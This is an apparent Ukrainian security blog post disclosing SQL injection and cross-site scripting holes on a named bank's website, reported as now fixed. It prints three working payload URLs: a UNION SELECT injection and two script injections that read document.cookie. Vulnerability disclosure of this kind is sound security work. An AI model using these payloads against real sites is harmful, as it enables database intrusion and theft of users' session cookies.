Websecurity - Веб безпека

30.01.2013

У липні, 15.07.2012, я знайшов SQL Injection та Cross-Site Scripting уразливості на http://jsbni.kiev.ua - сайті банка “Національні інвестиції”. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на jsbni.kiev.ua. Тоді дірки були в системі онлайн-банкінгу, а зараз на основному сайті банка.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

02.11.2013

SQL Injection:

http://www.jsbni.kiev.ua/index.php?Class=fRameWork&TemplateName=%27%20union%20select%201/*

XSS:

http://www.jsbni.kiev.ua/index.php?Class=fRameWork&TemplateName=%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
http://www.jsbni.kiev.ua/index.php?Class=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені (але вони займалися цим більше року) шляхом замінити одного движка на інший.

This entry was posted on 17:21 02.11.2013 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.